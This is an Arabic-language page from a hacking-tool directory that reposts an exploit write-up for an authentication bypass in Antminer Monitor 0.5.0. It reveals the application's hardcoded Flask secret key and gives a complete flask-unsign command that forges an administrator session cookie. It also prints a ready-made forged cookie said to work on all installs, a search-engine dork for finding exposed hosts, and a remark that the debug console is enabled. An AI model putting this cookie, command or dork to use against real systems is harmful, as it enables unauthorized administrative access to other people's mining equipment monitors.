Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2021-40903 — CVE-2021-40903 | Kitploit
أدوات/GitHubGitHub/vulnz/cve-2021-40903
المصادقة والترخيصتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالفريق الأحمر
GitHubvulnz/cve-2021-40903

CVE-2021-40903

CVE-2021-40903

عرض المستودع
منذ 4 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

عنوان الاستغلال: Antminer Monitor 0.5.0 - تجاوز المصادقة

CVE: CVE-2021-40903

التاريخ: 09/06/2021

Dork:https://www.zoomeye.org/searchResult?q=%22antminer%20monitor%22 مؤلف الاستغلال: CQR.company / Vulnz.

الصفحة الرئيسية للمورّد: https://github.com/anselal/antminer-monitor, https://twitter.com/intent/follow?screen_name=AntminerMonitor

رابط البرنامج: https://github.com/anselal/antminer-monitor, https://soulis.tech/

الإصدار: 0.5.0

تم اختباره على: Windows, Linux, Macos

يُستخدم البرنامج بشكل شائع لمراقبة أجهزة Antminer ويمكن العثور عليه بسهولة في zoomeye ( 800) و shodan ( 500). في الوقت الحالي، هذه هي أداة مراقبة antminer الأكثر شيوعًا. توجد الثغرة في Antminer Monitor بسبب باب خلفي أو إعداد خاطئ

من المطوّر داخل ملف الإعدادات في خادم Flask.

يحتوي ملف الإعدادات على سلسلة سرية محددة مسبقًا، والتي كان من المفترض أن تُولَّد عشوائيًا، لكنها ثابتة في هذا build.antminer-monitor/settings.py at 5c62e1064af30674bacb9e1917d5980efbde1fcd · anselal/antminer-monitor · GitHub https://github.com/anselal/antminer-monitor/blob/5c62e1064af30674bacb9e1917d5980efbde1fcd/config/settings.py

المفتاح السري هو 'super secret key'.

بناءً على هذه المعلومات، يمكننا صياغة ملفات تعريف ارتباط لتجاوز المصادقة.

باستخدام أداة flask-unsing يمكننا توليد ملف تعريف ارتباط سيمنحك وصولًا بصلاحيات المسؤول.

flask-unsign --sign --cookie "{'_fresh': True, '_id': b'df230a95eb5318d31fa83690c667cfd6a824dbfe61949bf30b9d75e71c6ea20714b87113fcafe2340df9a8a6f3567e7a2faedc2c12d05e4e338558e47afe84f6', '_user_id': '1', 'csrf_token': b'15d0261b7f3f40849920ebb94f7a2368397f76ff'}" --secret "super secret key" علاوة على ذلك، يمكنك استخدام ملف تعريف الارتباط الشامل هذا للوصول إلى الواجهة الإلكترونية لتطبيق Flask.

يمكن أن يعمل ملف تعريف الارتباط هذا على جميع الأنظمة في حقل "session".

.eJw9j81Og0AURl_FzLoLfmTTpAubaQkm9xLMpeTeTaNAGQdGE9BQp-m7O3HhA3zfOeemzpe5X4zaXl6npd-o83untjf18Ka2SnL-Ab83JZ0mtrUHMiP4o2MaPNpxZc8JJuhEiyl1EUn-7IT4WlKVsWMPeZGJbmOh9speJqZiRX-I2A4p0MGLQyOuDoxqDayMyRgMOyROhToDTow0LxYcXMFVKzZ1JAS-1HVc5nWEyTHwhkgs79Q9uH8v_fwXoGK1Ue0yX85fn2P_8V8EdBpBFwk0RSoWHeqnR9RjBnY_sSsyzDkNlqFu8CV1DoOjDLvwfv8FnZ1jTQ.YS2Hvw.a-bvt7Y4e2kKNs0iXkRxHnRRJAU

بالإضافة إلى ذلك، DEBUG = True مما يعني أن /console يعمل، لكنه يحتاج إلى رمز PIN.

تنزيل الأداة